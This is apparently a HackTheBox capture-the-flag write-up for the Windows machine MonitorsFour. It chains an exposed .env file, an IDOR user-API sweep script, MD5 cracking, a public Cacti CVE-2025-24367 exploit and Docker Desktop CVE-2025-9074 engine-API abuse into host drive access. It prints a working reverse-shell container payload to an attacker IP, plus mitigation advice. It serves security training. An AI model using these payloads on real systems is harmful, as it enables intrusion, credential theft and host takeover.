Difficulty: Easy

Operating System: Windows

Target IP: 10.129.133.214

Attack Vector: Cacti RCE → Docker Engine API (Docker Desktop) Container Escape → Windows Host Filesystem Access

---

# Summary

MonitorsFour is an Easy-rated Windows machine on HackTheBox that demonstrates a real-world attack chain combining web application exploitation with a Docker Desktop container escape that lands on the Windows host filesystem. The path to root involves:

1. Enumerating web services to discover Cacti monitoring platform

2. Exploiting CVE-2025-24367 in Cacti 1.2.28 (authenticated, so the cracked credentials are required) to gain an initial foothold as www-data inside a container

3. Discovering the Docker Engine API listening without authentication on 192.168.65.7:2375, Docker Desktop's internal address, reachable from inside the container

4. Leveraging CVE-2025-9074 (unauthenticated access to that API from any container) to create a new container with the host drive bind-mounted

5. Mounting the Windows C: drive into that container and reading the Administrator's files

---

# Reconnaissance

# Port Scanning

Initial reconnaissance revealed two open ports:

```bash
rustscan -a 10.129.133.214
```

Open Ports:

  • 80/tcp - HTTP (nginx)
  • 5985/tcp - WinRM (Windows Remote Management)

# Web Enumeration

```bash
# Add to hosts file
echo "10.129.133.214 monitorsfour.htb cacti.monitorsfour.htb" | sudo tee -a /etc/hosts

# Directory fuzzing
feroxbuster -u http://monitorsfour.htb/ -w /usr/share/seclists/Discovery/Web-Content/common.txt
```

Key Findings:

  • Main site: http://monitorsfour.htb
  • Environment file exposed: http://monitorsfour.htb/.env
  • Cacti subdomain: http://cacti.monitorsfour.htb/cacti/

# Exposed Credentials

The .env file, served directly by the web server, revealed database credentials. The host name `mariadb` (a service name rather than an IP) is an early hint that the stack is containerised:

```plaintext
DB_HOST=mariadb
DB_PORT=3306
DB_NAME=monitorsfour_db
DB_USER=monitorsdbuser
DB_PASS=f37p2j8f4t0r
```

# API Enumeration

The user endpoint returns whichever record is named by `id`, and the `token` parameter is not actually enforced (the request succeeds with `token=0`), so any account can be read without credentials. That is an IDOR combined with a broken authorization check:

```bash
curl -s "http://monitorsfour.htb/api/v1/user?id=2&token=0" | jq
```

User Credentials Found:

```json
{
  "id": 2,
  "username": "admin",
  "email": "admin@monitorsfour.htb",
  "password": "56b32eb43e6f15395f6c46c1c9e1cd36",
  "role": "super user",
  "token": "8024b78f83f102da4f",
  "name": "Marcus Higgins",
  "position": "System Administrator"
}
```

Additional users were found at IDs 5, 6, and 7. The `password` field is a 32-character hex string, i.e. an unsalted MD5 digest, which is what makes the next step cheap.

# Password Cracking

```bash
echo "56b32eb43e6f15395f6c46c1c9e1cd36" > hash.txt
john --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
```

Result: wonderful1

The API record belongs to the `admin` account (display name Marcus Higgins); the same password is reused for the Cacti account `marcus`.

Credentials: marcus:wonderful1
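The IDOR sweep and the hash preparation above, combined into one script. This is an added example and not part of the original writeup; it assumes the endpoint shape seen above (`/api/v1/user?id=N&token=0`) and flat JSON records with `username` and `password` string fields, and it only keeps records whose password field is a 32-hex MD5 digest so that non-MD5 or error responses do not pollute the john input.

```bash
#!/usr/bin/env bash
# Added example (not from the original writeup): walk the IDOR'd user endpoint
# and emit john-ready "username:md5" lines.
# Assumptions: endpoint shape /api/v1/user?id=N&token=0 (observed above), flat
# JSON records with "username" and "password" fields, curl and GNU grep/sed.
set -u

BASE_URL="${BASE_URL:-http://monitorsfour.htb}"

# Read one JSON record on stdin and print "username:hash".
# Returns 1 when there is no 32-hex password field (error body, unused id,
# or a non-MD5 hash that raw-md5 mode could not crack anyway).
extract_user_hash() {
    local json user hash
    json=$(cat)
    user=$(printf '%s' "$json" \
        | grep -o '"username"[[:space:]]*:[[:space:]]*"[^"]*"' | head -n1 \
        | sed 's/.*:[[:space:]]*"\([^"]*\)"/\1/')
    hash=$(printf '%s' "$json" \
        | grep -o '"password"[[:space:]]*:[[:space:]]*"[0-9a-fA-F]\{32\}"' | head -n1 \
        | sed 's/.*"\([0-9a-fA-F]\{32\}\)"/\1/')
    [ -n "$user" ] && [ -n "$hash" ] || return 1
    printf '%s:%s\n' "$user" "$hash"
}

# Sweep ids 1..N; ids that return no crackable record are silently skipped.
sweep_users() {
    local max="${1:-10}" id
    for id in $(seq 1 "$max"); do
        curl -s "${BASE_URL}/api/v1/user?id=${id}&token=0" | extract_user_hash || true
    done
}

# Usage:
#   sweep_users 10 > hashes.txt
#   john --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
```

Feeding `username:hash` lines to john keeps the username attached to each cracked password, which matters here because the hash belongs to `admin` but the password is reused by `marcus`.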

---

# Initial Access - Cacti CVE-2025-24367

# Cacti Login

Accessed Cacti at http://cacti.monitorsfour.htb/cacti/ with credentials:

  • Username: `marcus`
  • Password: `wonderful1`

Cacti Version: 1.2.28

# Exploitation

Used CVE-2025-24367 exploit from: https://github.com/TheCyberGeek/CVE-2025-24367-Cacti-PoC

```bash
cd /tmp
git clone https://github.com/TheCyberGeek/CVE-2025-24367-Cacti-PoC
cd CVE-2025-24367-Cacti-PoC

# Start listener
nc -lvnp 4444

# Run exploit
python3 exploit.py -u marcus -p wonderful1 -i 10.10.14.30 -l 4444 -url http://cacti.monitorsfour.htb
```

Exploit Output:

```plaintext
[+] Cacti Instance Found!
[+] Serving HTTP on port 80
[+] Login Successful!
[+] Got graph ID: 226
[i] Created PHP filename: UVbBH.php
[+] Got payload: /bash
[+] Hit timeout, looks good for shell, check your listener!
```

Shell Obtained:

```plaintext
www-data@821fbd6a43fa:~/html/cacti$
```

# User Flag

The shell lands in a container (hostname `821fbd6a43fa`) that already has the host drive mounted at `/host_root`, so the user flag is readable without any escape:

```bash
find /host_root/Users -name user.txt 2>/dev/null
cat /host_root/Users/marcus/Desktop/user.txt
```

User Flag: [USER_FLAG_HERE]

---

# Privilege Escalation - Docker Engine API Escape

# Container Enumeration

```bash
# Check environment
whoami            # www-data
hostname          # 821fbd6a43fa
cat /.dockerenv   # Confirmed Docker container

# Find Docker gateway
ip route show default
# default via 172.18.0.1 dev eth0

# Check for alternate gateways
ip addr show
# inet 172.18.0.2/16
```

# Docker API Discovery

Probed the candidate addresses for an unauthenticated Docker Engine API. `/info` returns the daemon's JSON description only when the API is open, so a JSON body (rather than a connection refused or 401) is the confirmation:

```bash
# Docker Desktop's internal address (the endpoint CVE-2025-9074 exposes)
curl http://192.168.65.7:2375/info

# Container gateway
curl http://172.18.0.1:2375/info
```

Docker API accessible at: 192.168.65.7:2375 (no TLS, no authentication)

# CVE-2025-9074 - Docker API Abuse

With Docker Desktop, every container can reach the engine API on 192.168.65.7:2375 without authentication. Anyone with a shell in any container can therefore talk to the engine as if they were the host's Docker user and:

1. Create new containers with arbitrary `HostConfig` settings

2. Bind-mount the host filesystem into them (on the Windows/WSL2 backend the C: drive is visible to the engine VM, so no `Privileged` flag is needed for this)

3. Run commands as root inside that container, with read/write access to the mounted host drive

# Exploitation Steps

Step 1: Start listener for root shell

```bash
nc -lvnp 1337
```

Step 2: Create privileged container with host filesystem mounted

```bash
curl -X POST -H "Content-Type: application/json" \
  -d '{
    "Image":"docker_setup-nginx-php:latest",
    "Cmd":["bash","-c","bash -i >& /dev/tcp/10.10.14.30/1337 0>&1"],
    "HostConfig":{
      "Binds":["/mnt/host/c:/fucked"]
    }
  }' \
  -o xx.json \
  http://192.168.65.7:2375/containers/create
```

Explanation:

  • `Image`: Reuses an image already present in the engine's cache (the Cacti stack's own image), so nothing has to be pulled from the internet
  • `Cmd`: Runs a bash reverse shell back to the attacker as the container's entrypoint
  • `Binds`: Bind-mounts the Windows C: drive at `/fucked` inside the new container
  • `/mnt/host/c`: Path of the Windows C: drive inside the Docker Desktop (WSL2) VM; bind sources are resolved by the engine in that VM, not by the calling container
  • `-o xx.json`: Saves the create response, `{"Id":"<64-hex id>","Warnings":[]}`, for the next step

Step 3: Extract container ID

```bash
# Response is {"Id":"<id>","Warnings":[]}; the 4th double-quote-delimited field is the Id
varr=$(cut -d'"' -f4 xx.json)
echo $varr # Container ID
```

Step 4: Start the container

```bash
curl -X POST -d '' http://192.168.65.7:2375/containers/$varr/start
```

# Root Shell Obtained

```plaintext
listening on [any] 1337 ...
connect to [10.10.14.30] from (UNKNOWN) [10.129.133.214] 49623
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
root@db7424878135:/var/www/html#
```

---

# Root Flag

```bash
cd /fucked
ls
# $RECYCLE.BIN, Program Files, Users, Windows, etc.

cd Users
ls
# Administrator, marcus, Public

cd Administrator/Desktop
ls
# desktop.ini, root.txt

cat root.txt
```

Root Flag: `8668a049358a4435..........

---

# Vulnerability Chain Summary

1. Information Disclosure - .env file exposed database credentials

2. IDOR (Insecure Direct Object Reference) - API allowed accessing any user data

3. Weak Password Hashing - MD5 hash easily cracked

4. CVE-2025-24367 - Cacti RCE via graph template exploitation

5. CVE-2025-9074 - Docker Desktop exposed the Engine API to containers without authentication

6. Insecure Container Configuration - Engine API reachable from inside the container, and the host drive already mounted into the Cacti container

7. Excessive Permissions - Engine API allowed arbitrary bind mounts of the host drive into new containers

---

# Key Techniques Used

# Web Application Testing

  • Directory fuzzing with feroxbuster
  • API endpoint enumeration
  • IDOR vulnerability exploitation

# Password Attacks

  • MD5 hash cracking with john/hashcat
  • Credential reuse testing

# Container Escape

  • Docker Engine API discovery from inside a container
  • Docker API abuse (container create/start over HTTP)
  • Host filesystem bind-mounting

# Post-Exploitation

  • Container pivot techniques
  • Windows filesystem navigation from Linux container

---

# Mitigation Recommendations

1. Secure Configuration Files

  • Never expose `.env` files publicly
  • Use proper `.gitignore` rules
  • Implement web server restrictions

2. API Security

  • Implement proper authentication/authorization
  • Validate token parameters
  • Use rate limiting
  • Prevent IDOR with indirect references

3. Password Security

  • Use strong hashing (bcrypt, Argon2)
  • Never use MD5/SHA1 for passwords
  • Implement password complexity requirements

4. Cacti Hardening

  • Update to latest version (patch CVE-2025-24367)
  • Restrict access to admin interface
  • Use strong authentication

5. Docker Security

  • Never expose the Docker socket or the Engine API to containers
  • Update Docker Desktop to a release that fixes CVE-2025-9074
  • Require TLS client authentication on any TCP-exposed Engine API
  • Implement proper network segmentation so containers cannot reach management endpoints
  • Use Docker security scanning
  • Apply the principle of least privilege (the Cacti container had no need for a host drive mount)
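A check for the self-managed engine case of the same exposure: a `daemon.json` that lists a `tcp://` host without `tlsverify` is an open, unauthenticated API exactly like the one abused above. This is an added example and not from the original writeup; it assumes the standard `hosts` and `tlsverify` keys of `daemon.json` and needs no jq. It does not apply to the Docker Desktop bug itself, which is fixed by updating the product rather than by configuration.

```bash
#!/usr/bin/env bash
# Added example (not from the original writeup): flag daemon.json files that
# expose the Engine API over TCP without TLS client authentication.
# Assumptions: standard daemon.json keys "hosts" and "tlsverify"; GNU grep.
set -u

# Returns 0 when acceptable (unix socket only, or tcp with tlsverify: true),
# 1 when a tcp:// listener exists without tlsverify, 2 when the file is unreadable.
audit_daemon_json() {
    local file="$1" hosts
    [ -r "$file" ] || { echo "[-] cannot read ${file}" >&2; return 2; }
    hosts=$(grep -o 'tcp://[^"]*' "$file" || true)
    if [ -z "$hosts" ]; then
        echo "[+] ${file}: no tcp:// listener"
        return 0
    fi
    if grep -q '"tlsverify"[[:space:]]*:[[:space:]]*true' "$file"; then
        echo "[+] ${file}: tcp listener(s) protected by tlsverify: $(printf '%s' "$hosts" | tr '\n' ' ')"
        return 0
    fi
    echo "[!] ${file}: unauthenticated tcp listener(s): $(printf '%s' "$hosts" | tr '\n' ' ')" >&2
    return 1
}

# Usage: audit_daemon_json /etc/docker/daemon.json
```

Run it across a fleet with something like `for h in ...; do ssh "$h" 'cat /etc/docker/daemon.json' > "$h.json"; audit_daemon_json "$h.json"; done`; a `tcp://0.0.0.0:2375` entry without `tlsverify` is the configuration that turns every container and every LAN neighbour into a Docker administrator.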

6. Container Hardening

  • Don't run containers as root
  • Use read-only root filesystems
  • Limit container capabilities
  • Implement AppArmor/SELinux policies

Note that the Cacti container was already running as www-data, and none of these controls would have blocked the escape: it needed only network reach to the engine API. They limit blast radius but are not a substitute for removing the API exposure.

---

# Tools Used

  • **rustscan** - Port scanning
  • **feroxbuster** - Directory fuzzing
  • **curl** - API testing and Docker API exploitation
  • **john/hashcat** - Password cracking
  • **netcat** - Reverse shell listener
  • **CVE-2025-24367 PoC** - Cacti exploitation
  • **jq** - JSON parsing

---

# References

  • CVE-2025-24367 (Cacti): https://nvd.nist.gov/vuln/detail/CVE-2025-24367 and PoC at https://github.com/TheCyberGeek/CVE-2025-24367-Cacti-PoC
  • CVE-2025-9074 (Docker Desktop, unauthenticated Engine API reachable from containers): https://nvd.nist.gov/vuln/detail/CVE-2025-9074
  • Docker Security Best Practices: https://docs.docker.com/engine/security/
  • Cacti Security Advisories: https://github.com/Cacti/cacti/security/advisories

---

# Timeline

1. 00:00 - Port scan & web enumeration

2. 00:05 - Discover .env file and API IDOR

3. 00:10 - Crack MD5 hash → wonderful1

4. 00:15 - Login to Cacti with marcus:wonderful1

5. 00:20 - Exploit CVE-2025-24367 → www-data shell

6. 00:25 - Enumerate Docker environment

7. 00:30 - Discover Docker API at 192.168.65.7:2375

8. 00:35 - Exploit CVE-2025-9074 → root shell

9. 00:40 - Access Windows filesystem → root flag

Total Time: ~40 minutes

---

# Flags

  • **User Flag:** `Users\marcus\Desktop\user.txt` on the host C: drive, read as `/host_root/Users/marcus/Desktop/user.txt` from the Cacti container (also visible under `/fucked/Users/...` in the escape container)
  • **Root Flag:** `8668a049.......

---

*Writeup by: bughunt3r*

*Date: December 6, 2025*

*Machine: MonitorsFour (HackTheBox)*
